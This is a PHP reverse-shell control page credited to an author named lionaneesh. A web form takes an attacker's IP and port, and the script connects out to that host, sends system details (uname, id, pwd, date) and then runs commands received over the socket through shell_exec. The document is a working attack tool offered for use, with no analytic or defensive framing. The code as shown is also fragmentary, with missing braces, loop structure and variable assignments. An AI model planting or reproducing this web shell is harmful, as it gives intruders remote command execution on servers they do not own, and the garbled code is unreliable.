

@@author : lionaneesh 
@@facebook : facebook.com/lionaneesh 
@@Email : lionaneesh@gmail.com 




    <title>Back Connect Shell -- PHP</title> 


<h1>Welcome to Back Connect Control Panel </h1> 

<p> Fill in the form Below to Start the Back Connect Service </p> 

if( isset($_GET['port']) && 
    isset($_GET['ip']) &&  
    $_GET['port'] != "" && 
    $_GET['ip'] != ""  
        echo "<p>The Program is now trying to connect!</p>"; 
        $ip = $_GET['ip'];  
        $sockfd=fsockopen($ip , $port , $errno, $errstr );  
        if($errno != 0) 
            echo "<font color='red'><b>$errno</b> : $errstr</font>"; 
        else if (!$sockfd) 
               $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>"; 
            fputs ($sockfd , 
            Back Connect in PHP\n 
            Coded by lionaneesh\n 
            @@author : lionaneesh 
            @@facebook : facebook.com/lionaneesh 
            @@Email : lionaneesh@gmail.com 
         $pwd = shell_exec("pwd"); 
         $sysinfo = shell_exec("uname -a"); 
         $id = shell_exec("id"); 
         $dateAndTime = shell_exec("time /t & date /T"); 
         $len = 1337; 
         fputs($sockfd ,$sysinfo . "\n" ); 
         fputs($sockfd ,$pwd . "\n" ); 
         fputs($sockfd ,$id ."\n\n" ); 
         fputs($sockfd ,$dateAndTime."\n\n" ); 
            $cmdPrompt ="(Shell)[$]> "; 
            fputs ($sockfd , $cmdPrompt );  
            $command= fgets($sockfd, $len); 
            fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); 
    <table align="center" > 
         <form method="GET"> 
            <table style="border-spacing: 6px;"> 
                        <input style="width: 200px;" name="port" value="31337" /> 
                    <td>IP </td> 
                    <td><input style="width: 100px;" name="ip" size='5' value=""/> 
                <input style="width: 90px;" class="own" type="submit" value="Connect back :D!"/> 
    <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p> 